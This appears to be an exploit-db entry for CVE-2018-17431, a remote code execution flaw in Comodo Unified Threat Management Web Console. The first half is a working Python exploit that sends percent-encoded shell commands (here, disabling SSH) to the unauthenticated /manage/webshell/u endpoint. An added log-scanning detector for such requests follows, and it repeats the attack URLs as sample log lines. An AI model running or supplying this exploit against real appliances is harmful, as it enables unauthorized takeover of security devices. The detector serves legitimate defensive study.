Comodo Unified Threat Management Web Console 2.7.0 – Remote Code Execution

  • Author: Milad Fadavvi
    Date: 2020-09-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48825/
  • # Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
    # Date: 2018-08-15
    # Exploit Author: Milad Fadavvi
    # Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
    # Vendor Homepage: https://www.comodo.com/
    # Version: Releases before 2.7.0 & 1.5.0
    # Tested on: Windows=Firefox/chrome - Kali=firefox
    # PoC & other info: https://github.com/Fadavvi/CVE-2018-17431-PoC
    # CVE : CVE-2018-17431
    # CVE details: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
    # CVSS 3 score: 9.8

    import sys
    from random import choice
    from string import digits

    import requests


    def RndInt(Length):
        # Return a string of `Length` random decimal digits; these only fill the
        # cosmetic s/w/h/l/_ query parameters of the webshell endpoint.
        return ''.join(choice(digits) for n in range(Length))


    if __name__ == "__main__":

        IP = input("IP: ")
        Port = input("Port: ")

        Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a'  ## Disable SSH
        # For more info about the command, read the manual of the specific Comodo UTM
        # version and the exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC).

        BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) + "&h=" + RndInt(2)
        BaseNComdURL = BaseURL + "&k=" + Command
        LastPart = "&l=" + RndInt(2) + "&_=" + RndInt(13)
        FullURL = BaseNComdURL + LastPart
        AdditionalEnter = BaseURL + "&k=%0a" + LastPart  # a second request carrying only an Enter keystroke

        try:
            FirstResponse = requests.get(FullURL).text
        except requests.RequestException:
            print('\nExploit failed due to an HTTP error. Check the given IP and Port!\n')
            sys.exit(1)

        SecondResponse = requests.get(AdditionalEnter).text
        if SecondResponse.find("Configuration has been altered") == -1:
            print("\nExploit Failed!\n")
            sys.exit(1)
        else:
            print("\nOK! Command Ran!\n")
            sys.exit(0)
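As an added defensive example (not part of the exploit-db entry or the author's PoC): a small detector that scans web-server access-log lines for requests to the /manage/webshell/u endpoint whose `k` parameter percent-decodes to text containing a newline, which is the keystroke-injection primitive the PoC above relies on. The log format and the sample lines are constructed assumptions, not data from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in a common combined-log shape (assumption).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Sep/2020:10:01:02 +0000] "GET /manage/webshell/u?s=1&w=123&h=45&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=12&_=1234567890123 HTTP/1.1" 200 312
10.0.0.5 - - [22/Sep/2020:10:01:03 +0000] "GET /manage/webshell/u?s=1&w=123&h=45&k=%0a&l=12&_=1234567890123 HTTP/1.1" 200 88
10.0.0.7 - - [22/Sep/2020:10:02:00 +0000] "GET /manage/webshell/u?s=2&w=300&h=40&k=%6c%73&l=3&_=1234567890124 HTTP/1.1" 200 45
10.0.0.9 - - [22/Sep/2020:10:03:00 +0000] "GET /manage/dashboard HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
WEBSHELL_PATH = "/manage/webshell/u"  # endpoint used by the PoC


def decode_k(target):
    """Return the percent-decoded `k` parameter of a request target aimed at the
    webshell endpoint, or None for any other path or when `k` is absent."""
    parts = urlsplit(target)
    if parts.path != WEBSHELL_PATH:
        return None
    # parse_qs already percent-decodes, so %0a becomes a real newline here.
    values = parse_qs(parts.query, keep_blank_values=True).get("k")
    return values[0] if values else None


def find_webshell_injection(log_text):
    """Flag webshell requests whose `k` value carries a CR or LF: a newline lets a
    single GET both type and submit a whole CLI command instead of one keystroke.
    Returns (source address, timestamp, decoded k) tuples, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        k = decode_k(m.group("target"))
        if k is not None and ("\n" in k or "\r" in k):
            hits.append((m.group("src"), m.group("ts"), k))
    return hits


if __name__ == "__main__":
    for src, ts, k in find_webshell_injection(SAMPLE_LOG):
        print(f"{ts} {src} webshell newline injection: {k!r}")
```

Because the log carries no session state, this heuristic flags the injection shape itself; on a patched console it is still worth alerting on, since interactive use of the shell sends keystrokes without embedded newlines.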